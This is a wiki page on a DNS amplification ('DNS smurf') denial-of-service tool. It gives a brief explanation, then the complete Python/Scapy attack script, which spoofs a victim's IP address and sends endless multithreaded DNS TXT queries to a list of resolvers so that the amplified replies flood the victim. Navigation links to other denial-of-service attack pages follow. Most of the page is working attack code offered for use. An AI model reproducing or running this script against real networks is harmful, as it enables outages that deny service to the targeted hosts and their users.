DoS/DNSSmurf

From charlesreid1

Tool: dnssmurf

Found a DNS smurf tool from K-Metal on pastebin: http://pastebin.com/gTxRQuFY

Here's how it works:

  • Read in a list of DNS servers
  • Start a large thread pool
  • With each thread in the pool, run the attack function

The attack function works as follows:

  • Loop over entire list of DNS servers
  • Send a crafted DNS request to each server

The real money shot is here: the use of Scapy to craft the DNS request: 

p=IP(dst=List[count],src=host)
u=UDP(dport=53,sport=random.randint(1024,65535))/DNS(rd=1,qd=DNSQR(qname="goo.gl", qtype="TXT")) #DNS Query
send(p/u,verbose=0)

It's sending a UDP over IP packet to one of the DNS servers found in the file, and setting it to look like it came from the sheep. The DNS packet is sent to port 53, and a random destination port is set. The DNS request is for "goo.gl".

This is simply run repeatedly, ad infinitum, by as many servers and threads as you'd like, with as many DNS servers as you'd like.

dnssmurf.py: 

#!/usr/bin/env python
 
######################
# DNS AMP dos attack #
#    by K-Metal      #
######################
 
from scapy.all import *
import threading, sys, random, time
 
#Proof of Concept
 
if len(sys.argv) < 2:   #Print Help
        print "Usage: "+sys.argv[0]+" <ip> <list> <threads>"
        sys.exit()
 
host = sys.argv[1] #Variables
File = sys.argv[2]
numthreads = int(sys.argv[3])
threads = []
 
with open(File) as f:   #Read list
        List = f.readlines()
 
Max = len(List) #Max length of the list
 
def flood():
        global host
        global List
        global Max
        print "Flooding..."
        while True:
                count = 0
                while count < Max:
                        p=IP(dst=List[count],src=host)
                        u=UDP(dport=53,sport=random.randint(1024,65535))/DNS(rd=1,qd=DNSQR(qname="goo.gl", qtype="TXT")) #DNS Query
                        send(p/u,verbose=0)
 
for n in range(numthreads):     #Multi-threading
        t = threading.Thread(target=flood)
        t.daemon = True
        t.start()
        threads.append(t)
 
while True:             #So CTRL+C kills all threads
        time.sleep(1)


Flags


Defcon.png
Denial of Service
denial of service attacks for denying users access to resources that they are otherwise entitled to access.


DoS


DoS at Layers 1 and 2:

Layer 1 and 2 DoS Attacks

CAM Table Overflow/MAC Flood: DoS/Mac Flood

CAM Table Poisoning: DoS/Cam Poisoning


DoS at Layers 3 and 4:

Layer 3 and 4 DoS Attacks

Syn Flood: DoS/SYN Flood

Smurf Attack (Ping Flood): DoS/Smurf Attack

DNS Attacks: DoS/DNS

DNSSmurf Attack: DoS/DNSSmurf

Wormhole Attack: DoS/Wormhole Attack

Black Hole Attack: DoS/Black Hole Attack

Byzantine Attack: DoS/Byzantine Attack

Sleep Deprivation Attack: DoS/Sleep Deprivation Attack

Stale Packets: DoS/Stale Packets


Toolz:

Hping  · Macof  · Tcpnice  · Hammer  · Tors Hammer


Category:DoS  · Category:Attacks  · Category:Kali Attack Layers

Flags  · Template:DoSFlag  · e





Retrieved from "https://charlesreid1.com/w/index.php?title=DoS/DNSSmurf&oldid=13278"